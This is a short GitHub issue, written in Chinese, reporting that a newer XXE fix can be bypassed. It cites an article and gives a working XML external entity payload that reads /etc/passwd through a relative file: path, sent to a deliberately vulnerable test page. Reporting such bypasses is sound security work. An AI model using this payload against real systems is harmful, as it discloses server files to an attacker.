新版XXE的修复逻辑遗漏
k4n5ha0 opened this issue · 1 comments
k4n5ha0 commented
https://www.anquanke.com/post/id/241107
依照上文,我发现其中提到一种方式的paylaod:
file:../../../../../../../../etc/passwd
payload是
http://XXXX/vulns/007-xxe-stax.jsp?data=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:../../../../../etc/passwd" >]><foo>&xxe;</foo>